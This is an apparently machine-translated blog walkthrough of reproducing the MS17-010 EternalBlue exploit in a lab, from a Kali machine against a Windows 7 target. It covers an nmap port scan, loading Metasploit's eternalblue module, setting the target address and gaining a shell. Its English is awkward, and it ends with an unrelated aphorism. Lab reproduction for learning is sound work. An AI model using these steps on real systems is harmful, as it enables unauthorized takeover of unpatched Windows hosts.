MS17-010 exploit reproduction

MS17-010 exploit reproduction

Prepare the environment:
win7靶机 IP地址:172.16.15.118
Kali攻击机 IP地址:172.16.15.50

First, we need to look at whether to open port 445 drone

Open kali terminal nmap 172.16.15.118 input port scanning of drone

1573699360821

You can see the port 445 is open

Next we enter msfconsole command to enter the Metasploit attack tool load module

After entering the tool command to view the available input search ms17-010 attack module

1573699588038

Check parameter to Yes modules are available for our use

Load attack module:

msf5 > use exploit/windows/smb/ms17_010_eternalblue

After entering the module we use the show options available to see what we need to set parameters

1573699759582

Required parameters are Yes we need to set a specific value

Since RPORT default port 445 so we do not make any settings

Setting goals ip: set rhosts 172.16.15.118

Attack: run command or exploit

1573699963378

After waiting for a while to find that we have successfully obtained a shell target drone

1573700012638

Reproduce the results of today's very successful

Finally, let me look hypocritical:

Unprincipled compromise will make people think you are not assertive is not the bottom line will make people think you forgive others treat you right and wrong how often you tune out the results

Guess you like

Origin www.cnblogs.com/yanlzy/p/11855627.html